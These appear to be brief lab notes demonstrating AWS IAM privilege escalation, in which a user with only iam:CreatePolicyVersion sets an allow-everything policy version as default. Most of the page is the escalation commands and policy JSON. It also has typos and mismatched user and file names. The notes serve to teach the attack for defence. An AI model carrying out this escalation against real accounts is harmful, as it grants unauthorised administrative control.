Introduction#
bad users create permission more than granted by exploiting IAM such as the create-policy-version and set-as-default.
- aws iam priviledge escaltion
- expoliting create-policy-version HERE
Create an Iam User#
create an iam user (no aws console access)
aws iam create-user --user-name demo1
create an access key, take note the credentials returned
aws iam create-access-key --user-name cli-iam-demo
then configure aws profile
aws configure
Create User Console Access#
this is optinal
aws iam create-login-profile --generate-cli-skeleton > test.json
fill username and password into the temlate test.json and
aws iam create-login-profile --cli-input file://test.jon
Apply a Policy to The User#
allow the use to create new versions of policies
{"Version": "2012-10-17","Statement": [{"Sid": "PrivEsc1","Effect": "Allow","Action": "iam:CreatePolicyVersion","Resource": "arn:aws:iam::*:policy/*"}]}
create a policy and take note the policy arn
aws iam create-policy \--policy-name AlloCreatePolicyVersion \--policy-document file://policy.json
attach
aws iam attach-user-policy \--user cli-iam-demo \--policy-arn $POLICY_ARN
Priveldge Escalation#
admin policy bad user ident
{"Version": "2012-10-17","Statement": [{"Sid": "AllowEverything","Effect": "Allow","Action": "*","Resource": "*"}]}
now the user upgrate their permission to admin
aws iam create-policy-version \-policy-arn $POLICY_ARN \--policy-document file://admin_policy.json \--set-as-default
Helper#
this will create a template for the input parameters so you know what to provide
aws iam create-policy --generate-cli-json